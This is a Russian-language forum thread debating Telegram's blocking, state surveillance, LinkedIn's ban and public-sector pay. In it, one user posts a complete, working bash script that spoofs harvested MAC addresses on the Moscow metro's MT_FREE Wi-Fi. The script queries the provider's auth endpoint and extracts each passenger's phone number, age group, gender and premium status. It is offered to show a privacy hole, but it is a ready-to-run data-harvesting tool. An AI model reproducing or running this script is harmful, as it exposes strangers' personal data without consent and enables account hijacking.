Я умный и певец. Флеймуем.

[marovi]

А какая связь у этих двух событий? Вы же неспроста упоминаете о них, противопоставляю друг другу? Или мне показалось?

Дык там дальше было.
И то, и то - дает доступ к личным данным.

У меня прокони пару раз за последнее время упали, пока была под впн. Отключила, вроде все норм, остальное нормально работало.

 

[wanderlight]

При чем тут правые и виноватые?

я-то тут при чем?
спросите у @Catherine1976
это она озвучила что ее точка зрения правильная, а остальных -- нет

Только @wanderlight озвучила, что по ее мнению запреты нужно предусматривать заранее

это озвучила @marovi , если что
но я согласна, кстати говоря. а если предусмотреть не удалось -- вносить дополнения в правовую базу
а не включать красный на пустой дороге, мотивируя тем, что закон есть закон и точка

но прогресс при этом не запретишь

поспорите с этим? ваши аргументы?

а что с этим делать - идей нет

запреты нужно предусматривать заранее

а если предусмотреть не удалось -- вносить дополнения в правовую базу

?
какие именно дополнения -- конечно, я не скажу, а вы, судя по всему, именно этого от меня хотите?

 

[Оленка]

Нет, конечно я имею в виду не закупки по 44-фз, потому что ни Росатом, ни Мосэнерго не торгуются по 44-ФЗ, они торгуются по 223-ФЗ.
ЕИС не единственная в стране программа госзакупок. Она - информационная система. Систем же обеспечения проведения госзаказчиком госзакупок, интегрированных с ЕИС, множество.

Я надеюсь, что Ваш муж больше подкован в госзакупках. Все бюджетные средства идут только через 44. 223 это внебюджет, коммерческая деятельность иначе говоря. И если у Мосэнерго ее сколько угодно, то для Росатома это сомнительно. Хотя... мы в России живем, у нас много разного случается

 

[Оленка]

зарплаты в гос ниже комерса в 2 3 раза

Вот тут я с Кrist соглашусь - начиная от начальника отдела в гос уже довольно давно гораздо слаще.

 

[AnnaVsp]

Ну мало ли что он окончил ))) откройте ха ха ту и сравните. Вы без труда разобьет вакансии на две группы - гос и комет
А на квартиру и машину хороший программист в принципе заработает без труда

Может быть. Я знаю у меня брат выпускался из ВИКА в 94 году, кстати мечтал как раз програмировать, а двоюродный брат из нахимовки ещё раньше, вот тогда была жесть, а сейчас все если не в шоколаде то совсем, совсем не плохо.

 

[Altusha]

Потому, что у Дурова позиция - работаю на бабло преступников.
Это он делал Вконтакте.
Из контакта выперли (что характерно - не мы, а его же партнеры. За кидалово. Мы прямо даже не успели. Бабло побеждает зло))
.

То-то в вк стало столько запрещенного контента. Что характерно: техподдержка даже не банит эти группы и делает изумленные глазки: без решения суда мы ни-ни.

 

[Чудь]

Вот тут я с Кrist соглашусь - начиная от начальника отдела в гос уже довольно давно гораздо слаще.

Я о программистах. Об обычных вакансиях программистов, не тех, что по своим, а обычных. По Москве 3 5 лет опыта дают возможность расчитывать на 40 70 тысяч в гос и на вилку 130-220 не гос
То, что там есть те, кто зарабатывает хорошо, я не сомневаюсь

 

[Чудь]

А какая связь у этих двух событий? Вы же неспроста упоминаете о них, противопоставляю друг другу? Или мне показалось?

Я чуть позже отвечу, автокоррект убивает

 

[Krist]

Надо добыть информацию, получили разрешение, взломали аккуратно КОНКРЕТНЫЙ эккаунт. Какие пробелемы ?

Видимо в том, что порой на взлом просто нет времени. @Catherine1976 уже приводила в теме пример, когда время стоит жизни. Я тоже пару примеров знаю. С точки зрения ведения оперативно-розыскной деятельности эффективнее иметь возможность по запросу потребовать готовую к использованию информацию, а не по запросу начинать взлом.

Сами аккуратно взломали что надо и тихонько пользуются. Если поймали, то вежливо извинились и сказали, что это было один раз, исключительная ситуация, а так они ни-ни .

Вспоминаем историю Сноудена, ага...

 

[Krist]

Призадумалась о правовом государстве которое вскрывает замки и ставит жучки , такое вообще как то возможно официально оформить?

Да, если обществом органам даны такие полномочия и порядок их реализации установлен и соблюдается.

 

[Нелля]

Никто на это не ответил))

Таня Корона на это ответила, на мой взгляд, исчерпывающе.

 

[AnnaVsp]

У нас на улице лето и опять солнце. Самое смешное народ уже дождю просто радуется ))) Питер ))

 

[Krist]

Но доступ же хотят ко всему и на основании этого запрещают компанию.

Эммм... Вы точно в теме или просто с середины продолжили? Компания - это ТГ имеется в виду?
Если да, то сообщаю: запрещают не потому, что хотят доступ ко всему, а потому, что компания отказывается 1) предоставлять 2) по запросу 3) метаданные.
Чувствуете разницу?

Эти дыры - возможность потенциальному террористу без особых усилий определить время максимальной загрузки станции и минимальной защищенности

Это без особых усилий? Без особых усилий - это однажды проехать на метро в 18:30. А собирать сведения о геолокации и т.д. посредством дыр - это с приложением охренеть каких усилий.

 

[marovi]

Таня Корона на это ответила, на мой взгляд, исчерпывающе.

На твой взгляд.
А на мой - передернула и не ответила.

Это без особых усилий? Без особых усилий - это однажды проехать на метро в 18:30. А собирать сведения о геолокации и т.д. посредством дыр - это с приложением охренеть каких усилий.

Ага)) с линкедом - не сравниться)))

 

[Нелля]

На твой взгляд.
А на мой - передернула и не ответила.

Аналогично передёргиванию с трёхдверной машиной. Для того, чтобы установить логичность этих сравнений, надо понять, насколько требования к телеграму и негативные последствия их исполнения сопоставимы с требованиями к трёхдверным машинам и негативными последствиями от их исполнения.

 

[marovi]

Аналогично передёргиванию с трёхдверной машиной. Для того, чтобы установить логичность этих сравнений, надо понять, насколько требования к телеграму и негативные последствия их исполнения сопоставимы с требованиями к трёхдверным машинам и негативными последствиями от их исполнения.

"Кольцевая", подумал Штрилиц.

Не, таки не читают.

 

[Нелля]

"Кольцевая", подумал Штрилиц.

Не, таки не читают.

Будешь как Катя утверждать, что объясняешь им, объясняешь, а они так ничего и не поняли?)))

Мне ни разу не было лень объяснить во второй, третий и четвёртый раз одно и то же, когда возникало недопонимание.

 

[Чудь]

@Krist
Я напомню, один из основных каменей преткновения по поводу linkedin - это претензия от ркн к ним, что они собирают данные незарегистрированных пользователей. То есть куки и ip. Эти данные не считаются персональными во всем внешнем мире, кроме России.
Я не буду искать видео с этим моментом, но там был диалог такой:
- Вы собираете куки и ip адреса
- Это не является персональными данными! (очень удивленно)
- Это вы так считаете.
(Я просто все важные ай ти новости себе всегда тезисно подбиваю в блокнот, чтобы потом гугл не лопатить, если понадобится)
Дальше были разговоры об опасности обработки и тэ дэ. Нас очень сильно охраняют.
При этом в московское метро добро пожаловать все. Иностранцы там тоже есть. Никаких усилий воспользоваться дырами не нужно - это стандартные запросы с маской, все.
Вот скрипт, который вам надо запустить

Для работы скрипта из зависимостей нужен только curl, json_pp, и желательно иметь новый oui.txt в /var/lib/ieee-data/ (скачать отсюда)


Использование: ./checkmacs.sh (файл с маками на каждой строке) [интерфейс]
По умолчанию используется интерфейс wlp1s0.

Спойлер: Скрипт

#!/bin/bash
# script for finding userdata from a list of macs.
# for educational purposes only, of course.

! sudo -p "we require sweet root juices to run, please let us in: " echo -n && exit 1

INPUT=$1
SSID=MT_FREE
DEV=${2:-wlp1s0}
OUTDIR=check-`date +%d-%m-%yT%H:%M:%S`

[ ! -e $INPUT ] && { echo 'no input'; exit 1; }
[ -z $SSID ] && { echo 'no connection'; exit 1; }

function progress() { echo -ne "\033[K"$1"\033["${#1}"D"; }
function status() { echo -e "\033[K$1"; }

function current_userdata() {
rm .ck 2> /dev/null
curl --retry 3 -s -b .ck -c .ck 'https://auth.wi-fi.ru/auth?segment=metro' > /dev/null 2>&1
curl --retry 3 -s -b .ck -c .ck 'https://auth.wi-fi.ru/auth?segment=metro&mac=ff-00-00-00-00-00' 2>/dev/null | grep userData | grep -oP '(?<=JSON.parse\(\").*?(?=\")' | sed 's/\\&quot;/"/g' | json_pp
rm .ck
}

function oui() {
MAC=$1
if [ -e /var/lib/ieee-data/oui.txt ]; then
OUIMAC=${MAC//:}
OUIMAC=${OUIMAC[@]:0:6}
MACINFO=`grep $OUIMAC /var/lib/ieee-data/oui.txt`
# getting naame (it's always 22 symbols away from the start)
MACINFO=${MACINFO[@]:22}
# removing \r on the end
echo -n ${MACINFO[@]:0:-1}
fi
}

tput civis

function on_exit() {
tput cnorm
echo "turning wifi back on"
nmcli dev set $DEV managed true
nmcli dev set $DEV autoconnect true
}

trap on_exit EXIT

mkdir $OUTDIR

echo "turning wifi on $DEV off for nmcli for now"

# turning it off in nmcli
nmcli dev set $DEV managed false >/dev/null 2>&1
nmcli dev set $DEV autoconnect false >/dev/null 2>&1

for MAC in $(cat $INPUT); do
echo -en "\033[2m"$MAC"\033[0m"' : '

progress "switching..."
sudo iw dev $DEV disconnect 2>/dev/null
sudo ip link set $DEV down
if ! sudo ip link set $DEV address $MAC > /dev/null 2>&1; then
status "failed to set mac?"
echo $MAC >> $OUTDIR/not-macs.txt
continue
fi
sudo ip link set $DEV up

progress "connecting..."

CON_SUCCESS=
for try in {1..3}; do
progress "try $try..."
if sudo iw dev $DEV connect -w $SSID | grep connected >/dev/null 2>&1 ; then
CON_SUCCESS=1
break
fi
done

if ! [ $CON_SUCCESS ]; then
status "failed to connect to wi-fi"
echo $MAC >> $OUTDIR/no-assoc-macs.txt
continue
fi

progress "getting ip..."

if ! sudo dhclient -1 $DEV; then
status "DHCP failed"
echo $MAC >> $OUTDIR/no-ip-macs.txt
continue
fi

progress "userdata..."

USERDATA=$OUTDIR/$MAC-userdata.txt
current_userdata 2>/dev/null > $USERDATA

if [ -s $USERDATA ]; then

AGE=`cat $USERDATA | grep -Po '(?<=age\"\ \:\ \").*?(?=\")'`
PHONE=`cat $USERDATA | grep -Po '(?<=msisdn\"\ \:\ \").*?(?=\")'`
PREMIUM=`cat $USERDATA | grep -Po '(?<=premium\"\ \:\ )\w*'`
GENDER=`cat $USERDATA | grep -Po '(?<=gender\"\ \:\ \").*?(?=\")'`
OUI=`oui $MAC`

# just adding some more highlight to that sweet mark of ad-free wifi mac goodness
if [ $PREMIUM == true ]; then
PREMIUM="\033[32;1mtrue\033[0;36m"
echo $MAC >> $OUTDIR/good-macs.txt
fi

status "got userdata \033[36m{ msisdn: ${PHONE}, age group ${AGE}, gender: ${GENDER}, premium: ${PREMIUM}, vendor: $OUI }\033[0m "
else
status "no userdata"
rm $USERDATA
echo $MAC >> $OUTDIR/no-reg-macs.txt
fi

done

Не особо длинный, да? И ничего сложного, обычные запросы
А вот такую информацию вы можете собирать

Кто угодно. Без согласия. И никто не считает, что эту уязвимость надо убирать. Сделали "на отвали", лишь бы не цеплялись - не дают получить номер телефона, остальное на здоровье. Куки опаснее
Нельзя так придираться к остальным и оставлять дыры у себя. Это нелогично и некрасиво

«Те, кто готовы пожертвовать насущной свободой ради малой толики временной безопасности, не достойны ни свободы, ни безопасности.»

 

[wanderlight]

слушайте, ну так кто-нибудь все-таки попробовал ответить на вопрос "зачем, если блок все равно не работает?", который задавали я и марови

пока что был вроде бы только вариант
- зачем?
- а что, госнадзору нужно было молчать?

 

[wanderlight]

@Чудь прям ыыыыы
ништяк, чо)